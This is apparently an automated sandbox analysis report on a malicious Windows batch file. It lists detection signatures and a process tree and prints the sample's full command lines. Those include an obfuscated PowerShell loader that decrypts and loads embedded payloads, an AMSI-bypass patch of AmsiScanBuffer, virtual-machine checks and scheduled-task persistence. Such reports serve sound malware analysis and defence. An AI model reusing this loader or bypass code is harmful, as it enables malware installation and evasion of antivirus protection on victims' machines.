Edit tour

Windows Analysis Report
Q5N7WOpk8J.bat

Overview

General Information

Sample name:	Q5N7WOpk8J.bat renamed because original name is a hash value
Original sample name:	5c6dbf4219fd4e2251de392eb2544581.bat
Analysis ID:	1519360
MD5:	5c6dbf4219fd4e2251de392eb2544581
SHA1:	8f79ac10fd2bf6f5324ff9c19f278e3f9d5b4fa3
SHA256:	fd4270f11afee189662bb9bd907f3d732002a44a76ab3c356b50e0e64a4e81b4
Tags:	batuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious values (likely registry only malware)

Deletes itself after installation

Found large BAT file

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6720 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5480 cmdline: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 7228 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 7244 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 7340 cmdline: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7348 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7744 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7808 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7940 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 7956 cmdline: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 7992 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 8012 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 8076 cmdline: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8084 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

schtasks.exe (PID: 1352 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7252 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 6696 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'ddre'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bli'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MlhLFxQWSgAKoXShnVb=oxbNdIdJMSmp @([String])([IntPtr]);$VJNyACbUNbdCoehksOpZGU=oxbNdIdJMSmp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YJrcNCzTvEU=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$IHAbcsfdEtkEyD=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QNPqhRmAgVHBRCOcZ=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$NjQOgbk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$NjQOgbk,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+'n'+'B'+'uff'+[Char](101)+''+'r'+'')));$dMXDRTQmEn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,4,[ref]$dMXDRTQmEn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tHbMpbZeVqMdjOqLT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,0x20,[ref]$dMXDRTQmEn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'+[Char](116)+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 3268 cmdline: C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 8084	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x520:$b2: ::FromBase64String( 0x2bb1c:$b2: ::FromBase64String( 0x2bb7a:$b2: ::FromBase64String( 0x95a3d:$b2: ::FromBase64String( 0x261df:$s1: -join 0xc0dce:$s1: -join 0xc30da:$s1: -join 0x1d40d:$s3: Reverse 0x1e2bc:$s3: Reverse 0x20c14:$s4: += 0x20cb6:$s4: += 0x243fe:$s4: += 0x25eb4:$s4: += 0x260ca:$s4: += 0x261c1:$s4: += 0x3665a:$s4: += 0xbd01b:$s4: += 0xbd03a:$s4: += 0xbd075:$s4: += 0xbd092:$s4: += 0xbd0cd:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); , CommandLine: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}f

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

